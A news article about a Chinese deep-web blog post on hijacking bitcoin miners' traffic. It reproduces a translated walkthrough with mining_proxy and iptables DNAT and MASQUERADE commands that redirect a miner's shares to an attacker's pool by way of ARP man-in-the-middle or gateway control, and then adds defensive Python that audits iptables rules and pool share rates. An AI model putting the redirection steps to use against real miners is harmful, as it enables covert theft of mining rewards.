Chinese Deep Web Site Explains How to Hijack Mining Profits

A Chinese-language hacking blog in the deep web has described a technique that could theoretically reroute mining rewards to the hacker’s account.

The post was found on a Chinese-language hacking blog linked from a popular deep web wiki/site lister. It describes a technique in which the attacker uses an already installed virus or trojan, or a man-in-the-middle position on the network, to reroute the miner's packet data to a different pool. The post claims there would be little to no evidence that anything had gone wrong.

While we have not confirmed that this potential malware is in the wild, or has even been developed beyond the concept stage, it isn't hard to imagine how concerning the effects could be. Since the attacker would have complete control of the packet data, the damage could be difficult to detect. The attacker could pass some rewards on to the miners while keeping a cut. A drop in output may go unnoticed for a while, because mining success is largely a matter of luck. Over time, a miner could become suspicious after consistently low returns for the rig's stated hashing power, but by then the attacker would already have walked away with some bitcoin.

Potentially, it could bleed a massive mining operation dry, eating into the already razor-thin profit margins of mining.

The attack requires a foothold on the miner's network path (the post's cases are a trojan on the miner, an ARP man-in-the-middle on the LAN, or control of the gateway) and the ability to modify iptables rules. A criminal with that kind of access could do far more damage than rerouting mining profits, but this method is novel in its potential to fly below the radar.

We consulted a few experts about the plausibility of such an attack, including Bitcoin security consultant and early mining operator Blake Anderson and Spencer Liven of Sterlingcoin, and were told that it certainly seems possible. Anderson stated: “The security vulnerability [the post] references [are] Trojans and man in the middle attack[s]. If you assume both of those vulnerabilities, virtually anything becomes possible.”

Below is an English rendering of the post, cleaned up from a Google Translate draft. Nothing has been removed; only the author's introduction, which is unrelated to the technique, has been moved after the technical part and translated separately. We welcome improved translations from readers.

This post introduces hijacking the network packets of a BTC mining machine. Once the miner's packets have been captured, their contents can be tampered with so that the miner's hashrate is pointed at another pool. None of this requires modifying the miner's configuration file, so the owner sees nothing unusual on the miner's status page; the only thing the operator notices is a drop in hashrate at the pool.

First, all network packets of mining machine M must pass through the attacker's machine A (assume its IP is …). 1) If M and A both have public IPs, a trojan must be implanted on M; this blog will not discuss that topic for now. 2) If M and A are on the same local network and A is not the gateway, launch an ARP man-in-the-middle attack against M so that all of M's packets are forwarded via A. 3) If M and A are on the same local network and A is the gateway, that is, the network administrator is the attacker, this is the most convenient situation: packets can be hijacked directly.

The basic idea of the hijack is: first start a mining_proxy on A and make sure it connects to the pool properly, then forward all of M's mining requests to A's mining_proxy. Suppose M's IP is …, A's IP is … and gateway G's IP is … (after the ARP man-in-the-middle attack is complete, the gateway's IP no longer matters). The specific steps are as follows:

1) Start mining_proxy on A
mining_proxy -o pool -p port -sh -sp 3333 -oh -gp 3334 -cu user -cp pass
See mining_proxy's documentation for the parameters; here the Stratum protocol listens on port 3333.

2) Hijacking packets with iptables
Refer to the iptables packet-flow diagram. Normally the mining packets take the rightmost path: PREROUTING chain -> FORWARD chain -> POSTROUTING chain. After hijacking they take the middle and left-hand path: PREROUTING chain -> INPUT chain -> local process (i.e. mining_proxy) -> OUTPUT chain -> POSTROUTING chain.

First, in the PREROUTING chain, rewrite the destination address of inbound packets (the address after --to-destination, A's IP and port, did not survive in the copy of the post available to us):
iptables -t nat -A PREROUTING -p tcp --dport 3333 -j DNAT --to-destination
iptables -t nat -A PREROUTING -p tcp --dport 3334 -j DNAT --to-destination
Ports 3333 and 3334 are DNATed here because most pools use these two ports.

Then open port 3333 in A's firewall:
iptables -A INPUT -p tcp --dport 3333 -j ACCEPT

Finally, in the POSTROUTING chain, disguise the returning data:
iptables -t nat -A POSTROUTING -j MASQUERADE
Since there is no guarantee that the pool address M points to stays unchanged (the miner may switch pools, and a pool may have several IPs), the return traffic cannot use SNAT; only MASQUERADE will do.

At this point the whole hijack is complete. You should now see mining_proxy receiving the shares submitted by the mining machine, while the pool that mining_proxy points to starts to count the hashrate.

It's the new year, so there should be some changes. I thought it over and decided this blog does not need to be confined to a single topic, so this year's posts will cover a wider range; today's post, for instance, is about hacking techniques. I intend to keep this blog going for the long term, so I don't rule out sharing content about drugs and weapons once I have come into contact with them in the future. In any case, what I share here is my own experience, or at least methods I consider reasonable, so it has a certain feasibility. The downside is that the range of topics is limited; you may not find the information you are looking for, such as ATM withdrawals and other physical carding. To friends looking for that kind of information I can only be honest: this blog probably won't help you much, at least not until I have come into contact with that content myself.




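The rules above are what the hijack leaves behind on gateway A, so anyone who administers a gateway in front of miners can audit for them. The following is an added example by the editor, not code from the post or from mining_proxy. It parses an `iptables-save -t nat` dump (a constructed one is embedded, using RFC 5737 documentation addresses 192.0.2.x) and reports DNAT rules that redirect the Stratum ports 3333/3334, covering the plain `--dport` form the post uses as well as multiport lists and port ranges, plus the blanket MASQUERADE rule. One caveat: the miner itself cannot see this, since the rewrite happens upstream of it; the check is only useful on infrastructure you control.

```python
"""Audit an iptables-save nat dump for the Stratum-port DNAT pattern from the
post.  Editor's example, not the post's or mining_proxy's code; the ruleset
below is constructed and uses RFC 5737 test addresses."""
import shlex
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set

STRATUM_PORTS = {3333, 3334}  # the two ports the post redirects

# Constructed `iptables-save -t nat` output: one benign HTTPS port-forward to a
# web server, then the rules the post installs on gateway A (one of them written
# with multiport to show that form is caught too).
SAMPLE_NAT_DUMP = """\
*nat
:PREROUTING ACCEPT [0:0]
:INPUT ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
:POSTROUTING ACCEPT [0:0]
-A PREROUTING -p tcp -m tcp --dport 443 -j DNAT --to-destination 192.0.2.20:443
-A PREROUTING -p tcp -m tcp --dport 3333 -j DNAT --to-destination 192.0.2.10:3333
-A PREROUTING -p tcp -m multiport --dports 3334,4444 -j DNAT --to-destination 192.0.2.10:3333
-A POSTROUTING -j MASQUERADE
COMMIT
"""


@dataclass
class Finding:
    chain: str
    ports: List[int]            # watched ports this rule redirects
    destination: Optional[str]  # value of --to-destination, if present
    rule: str


def _option_value(tokens: List[str], *names: str) -> Optional[str]:
    """Return the argument following the first of `names` found in the rule."""
    for i, tok in enumerate(tokens[:-1]):
        if tok in names:
            return tokens[i + 1]
    return None


def _watched_ports_in_rule(tokens: List[str], watch: Iterable[int]) -> Set[int]:
    """Ports from `watch` matched by --dport N, --dport lo:hi or multiport
    --dports a,b,lo:hi.  Ranges are intersected with `watch` rather than
    expanded, so a 1:65535 catch-all stays cheap."""
    hits: Set[int] = set()
    for i, tok in enumerate(tokens[:-1]):
        if tok in ("--dport", "--destination-port", "--dports", "--destination-ports"):
            for part in tokens[i + 1].split(","):
                lo, _, hi = part.partition(":")
                lo_i, hi_i = int(lo), int(hi) if hi else int(lo)
                hits.update(p for p in watch if lo_i <= p <= hi_i)
    return hits


def find_stratum_dnat(dump: str, watch: Iterable[int] = STRATUM_PORTS) -> List[Finding]:
    """Every -A rule in the dump that jumps to DNAT and touches a watched port."""
    watch = set(watch)
    findings: List[Finding] = []
    for raw in dump.splitlines():
        line = raw.strip()
        if not line.startswith("-A "):
            continue  # table name, chain policy lines, COMMIT
        tokens = shlex.split(line)
        if _option_value(tokens, "-j", "--jump") != "DNAT":
            continue
        hits = sorted(_watched_ports_in_rule(tokens, watch))
        if hits:
            findings.append(Finding(tokens[1], hits, _option_value(tokens, "--to-destination"), line))
    return findings


def has_blanket_masquerade(dump: str) -> bool:
    """True if POSTROUTING masquerades everything with no match criteria, the
    exact rule the post adds so return traffic appears to come from A."""
    return any(shlex.split(l.strip()) == ["-A", "POSTROUTING", "-j", "MASQUERADE"]
               for l in dump.splitlines() if l.strip().startswith("-A "))


if __name__ == "__main__":
    for f in find_stratum_dnat(SAMPLE_NAT_DUMP):
        print(f"{f.chain}: ports {f.ports} -> {f.destination}   [{f.rule}]")
    print("blanket MASQUERADE present:", has_blanket_masquerade(SAMPLE_NAT_DUMP))
```

Run it against `iptables-save -t nat` output on the gateway (`find_stratum_dnat(open(path).read())`). A DNAT of Stratum ports to a host that is not your own proxy, together with a catch-all MASQUERADE, is the exact signature of the post's setup.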


This sort of attack does not represent a vulnerability in the Bitcoin network itself. It does, however, illustrate that attacks are evolving towards ever more sophisticated tactics. We will keep an eye out for more novel attacks on mining and on bitcoin in general. In the meantime, mining operators are advised to always apply the most stringent security measures. Other media outlets and security research firms are welcome to contact me for more information.
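Both the article and the post say the same thing about detection: the miner's own status page looks normal, and the only visible symptom is fewer shares credited at the pool than the rig's hashrate predicts. That shortfall can be tested statistically instead of waiting for a hunch. The following is an added example by the editor, not the post's code. It assumes the operator can read accepted share counts per hour for the account from the pool's page or API, and it uses constructed numbers: a 14 TH/s rig at share difficulty 8192, which should find about 1432 shares an hour, once honest and once with roughly 5% of its shares diverted.

```python
"""Share-rate audit: does the pool credit the shares a rig's stated hashrate
predicts?  Editor's example for this article, not code from the post; the rig
parameters and hourly share counts below are constructed."""
import math
from dataclasses import dataclass
from typing import List, Tuple

TWO_32 = 2 ** 32  # hashes needed on average for one difficulty-1 share

# Constructed scenario: a 14 TH/s rig at pool share difficulty 8192, which
# should find about 1432 shares per hour (standard deviation about 38).
RIG_HASHRATE_HS = 14e12
SHARE_DIFFICULTY = 8192
WINDOW_SECONDS = 3600

# Pool-side accepted shares per hour (assumed to come from the pool's account
# page or API).  HONEST_HOURS scatter around the expectation; SKIMMED_HOURS is
# the same rig with about 5% of its shares credited to someone else.
HONEST_HOURS = [1418, 1447, 1401, 1460, 1439, 1425, 1452, 1410, 1433, 1471, 1396, 1438]
SKIMMED_HOURS = [1358, 1372, 1349, 1366, 1381, 1340, 1355, 1369, 1347, 1377, 1352, 1364]


def expected_shares(hashrate_hs: float, share_difficulty: float, seconds: float) -> float:
    """Mean share count: each share costs share_difficulty * 2^32 hashes on average."""
    return hashrate_hs * seconds / (share_difficulty * TWO_32)


def poisson_cdf(k: int, lam: float) -> float:
    """P(X <= k) for X ~ Poisson(lam), summed in log space so that lam in the
    tens of thousands neither overflows exp() nor underflows to zero."""
    if lam <= 0:
        raise ValueError("lam must be positive")
    if k < 0:
        return 0.0
    log_terms = [i * math.log(lam) - lam - math.lgamma(i + 1) for i in range(k + 1)]
    peak = max(log_terms)
    return math.exp(peak) * sum(math.exp(t - peak) for t in log_terms)


@dataclass
class Verdict:
    observed: int
    expected: float
    p_value: float  # chance of seeing this few shares or fewer by luck alone
    flagged: bool


def audit_window(observed: int, seconds: float, alpha: float = 0.001,
                 hashrate_hs: float = RIG_HASHRATE_HS,
                 share_difficulty: float = SHARE_DIFFICULTY) -> Verdict:
    """Flag a window whose share count is improbably low for the rig."""
    lam = expected_shares(hashrate_hs, share_difficulty, seconds)
    p = poisson_cdf(observed, lam)
    return Verdict(observed, lam, p, p < alpha)


def audit_period(hourly_shares: List[int], alpha: float = 0.001,
                 **rig: float) -> Tuple[List[Verdict], Verdict]:
    """Per-hour verdicts plus one pooled verdict over the whole period.  The
    pooled test is what exposes a small, steady skim: each hour on its own is
    within bad-luck range, the day as a whole is not."""
    per_window = [audit_window(s, WINDOW_SECONDS, alpha, **rig) for s in hourly_shares]
    pooled = audit_window(sum(hourly_shares), WINDOW_SECONDS * len(hourly_shares), alpha, **rig)
    return per_window, pooled


if __name__ == "__main__":
    for label, hours in (("honest", HONEST_HOURS), ("skimmed", SKIMMED_HOURS)):
        per, pooled = audit_period(hours)
        print(f"{label}: hours flagged={sum(v.flagged for v in per)}/{len(per)}, "
              f"pooled observed={pooled.observed} expected={pooled.expected:.0f} "
              f"p={pooled.p_value:.2e} flagged={pooled.flagged}")
```

The design point is the pooled test. With a 5% skim no single hour falls below a 0.1% tail, which is exactly why the post's author expects the victim to notice nothing, but twelve hours pooled together sit more than six standard deviations under expectation. Feed the same function the per-account figures the pool reports and it turns "consistently low" into a number you can alert on.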
